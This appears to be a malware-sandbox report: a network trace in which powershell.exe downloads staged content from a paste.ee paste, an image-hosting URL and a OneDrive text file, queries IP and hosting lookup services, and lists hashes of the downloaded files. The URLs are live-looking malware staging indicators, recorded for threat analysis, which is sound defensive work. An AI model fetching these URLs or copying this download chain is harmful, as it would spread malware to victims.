Content-Type: text/plain
Content-Location: https://br9l5q.am.files.1drv.com/y4m48IEncEtvfOXO40f6w4-xC_tBTQyRJzLD_hAAUfyGG1yqFf-Kk2ARGH9QpHvI1lZejBNu7lZClLluDuhW4I483IcWXdPOAiP6bzSOBcs-mbsLsQ_Y89YTklA_8Xg_xLZyyGtyxQDrlN6cs4ht6Z1frQxz4JOP1k1SkjCdCUqTgOHrWGN53rnkCWFpxdIcP1P
Expires: Sun, 12 May 2024 01:44:06 GMT
Last-Modified: Thu, 08 Feb 2024 22:44:09 GMT
Accept-Ranges: bytes
ETag: 9A063D4B0D931024!297.3
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-MSNSERVER: AM3PPF8B759C201
Strict-Transport-Security: max-age=31536000; includeSubDomains
MS-CV: S02oN3oE0UmlysgpAbrd3Q.0
X-SqlDataOrigin: S
CTag: aYzo5QTA2M0Q0QjBEOTMxMDI0ITI5Ny4yNTc
X-PreAuthInfo: rv;poba;
Content-Disposition: attachment; filename="bdlz.txt"
X-Content-Type-Options: nosniff
X-StreamOrigin: X
X-AsmVersion: UNKNOWN; 19.1338.129.2007
X-Cache: CONFIG_NOCACHE
X-MSEdge-Ref: Ref A: E570ECB057D0424A8A14FF19BCBB524B Ref B: LON04EDGE1116 Ref C: 2024-02-12T01:44:06Z
Date: Mon, 12 Feb 2024 01:44:06 GMT
-
Remote address:8.8.8.8:53Request11.137.107.13.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request12.42.107.13.in-addr.arpaIN PTRResponse12.42.107.13.in-addr.arpaIN PTR1drvms
-
Remote address:8.8.8.8:53Request133.211.185.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestapi.ipify.orgIN AResponseapi.ipify.orgIN A104.26.13.205api.ipify.orgIN A172.67.74.152api.ipify.orgIN A104.26.12.205
-
Remote address:104.26.13.205:443RequestGET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Host: api.ipify.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 12
Connection: keep-alive
Vary: Origin
CF-Cache-Status: DYNAMIC
Server: cloudflare
CF-RAY: 8541250e8ac74052-LHR
-
Remote address:8.8.8.8:53Requestip-api.comIN AResponseip-api.comIN A208.95.112.1
-
Remote address:208.95.112.1:80RequestGET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
-
Remote address:8.8.8.8:53Request205.13.26.104.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request1.112.95.208.in-addr.arpaIN PTRResponse1.112.95.208.in-addr.arpaIN PTRip-apicom
-
Remote address:8.8.8.8:53Request26.165.165.52.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request56.126.166.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request28.160.77.104.in-addr.arpaIN PTRResponse28.160.77.104.in-addr.arpaIN PTRa104-77-160-28deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request168.117.168.52.in-addr.arpaIN PTRResponse
-
379 B 965 B 5 4
HTTP Request
GET http://paste.ee/d/QkK2fHTTP Response
301 -
1.2kB 20.5kB 16 23
HTTP Request
GET https://paste.ee/d/QkK2fHTTP Response
200 -
172.67.215.45:443https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673tls, httppowershell.exe402.0kB 8.7MB 5652 6257
HTTP Request
GET https://uploaddeimagens.com.br/images/004/731/958/original/new_image.jpg?1707143673HTTP Response
200 -
13.107.137.11:443https://onedrive.live.com/download?resid=9A063D4B0D931024%21297&authkey=!AC_BFHUXoySySpMtls, httppowershell.exe897 B 6.3kB 9 10
HTTP Request
GET https://onedrive.live.com/download?resid=9A063D4B0D931024%21297&authkey=!AC_BFHUXoySySpMHTTP Response
302 -
13.107.42.12:443https://br9l5q.am.files.1drv.com/y4mPuzsTxSOK_JhylUeVJ_mlOcxgk77u4HAtXFcnHFxs5Bwz-ot4ty9jKEgY_gkUnJOJM8obh7uU1ug-Z0IHz_mG69u8cyaI2jlsCi0F8MuXnBLg5Ch8BUkoafN2I2-35RTBy2ODuRXjqdEh-SdHVbjP-prZciNpRUZaPCTtFgFxfEIhDId55coipT8wdfVDtQe8hjbwNIeJCO3jEob6RQ1Sg/bdlz.txt?download&psid=1tls, httppowershell.exe6.9kB 353.9kB 135 263
HTTP Request
GET https://br9l5q.am.files.1drv.com/y4mPuzsTxSOK_JhylUeVJ_mlOcxgk77u4HAtXFcnHFxs5Bwz-ot4ty9jKEgY_gkUnJOJM8obh7uU1ug-Z0IHz_mG69u8cyaI2jlsCi0F8MuXnBLg5Ch8BUkoafN2I2-35RTBy2ODuRXjqdEh-SdHVbjP-prZciNpRUZaPCTtFgFxfEIhDId55coipT8wdfVDtQe8hjbwNIeJCO3jEob6RQ1Sg/bdlz.txt?download&psid=1HTTP Response
200 -
854 B 5.5kB 9 9
HTTP Request
GET https://api.ipify.org/HTTP Response
200 -
310 B 267 B 5 2
HTTP Request
GET http://ip-api.com/line/?fields=hostingHTTP Response
200
-
54 B 86 B 1 1
DNS Request
paste.ee
DNS Response
104.21.84.67172.67.187.200
-
72 B 158 B 1 1
DNS Request
79.121.231.20.in-addr.arpa
-
71 B 133 B 1 1
DNS Request
67.84.21.104.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
154.239.44.20.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
180.178.17.96.in-addr.arpa
-
68 B 100 B 1 1
DNS Request
uploaddeimagens.com.br
DNS Response
172.67.215.45104.21.45.138
-
71 B 157 B 1 1
DNS Request
72.32.126.40.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
45.215.67.172.in-addr.arpa
-
73 B 144 B 1 1
DNS Request
95.221.229.192.in-addr.arpa
-
126 B 274 B 2 1
DNS Request
onedrive.live.com
DNS Request
onedrive.live.com
DNS Response
13.107.137.1113.107.139.11
-
70 B 279 B 1 1
DNS Request
br9l5q.am.files.1drv.com
DNS Response
13.107.42.12
-
72 B 158 B 1 1
DNS Request
11.137.107.13.in-addr.arpa
-
71 B 92 B 1 1
DNS Request
12.42.107.13.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
133.211.185.52.in-addr.arpa
-
59 B 107 B 1 1
DNS Request
api.ipify.org
DNS Response
104.26.13.205172.67.74.152104.26.12.205
-
56 B 72 B 1 1
DNS Request
ip-api.com
DNS Response
208.95.112.1
-
72 B 134 B 1 1
DNS Request
205.13.26.104.in-addr.arpa
-
71 B 95 B 1 1
DNS Request
1.112.95.208.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
26.165.165.52.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
56.126.166.20.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
28.160.77.104.in-addr.arpa
-
73 B 147 B 1 1
DNS Request
168.117.168.52.in-addr.arpa
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
64B
MD55caad758326454b5788ec35315c4c304
SHA13aef8dba8042662a7fcf97e51047dc636b4d4724
SHA25683e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391
SHA5124e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82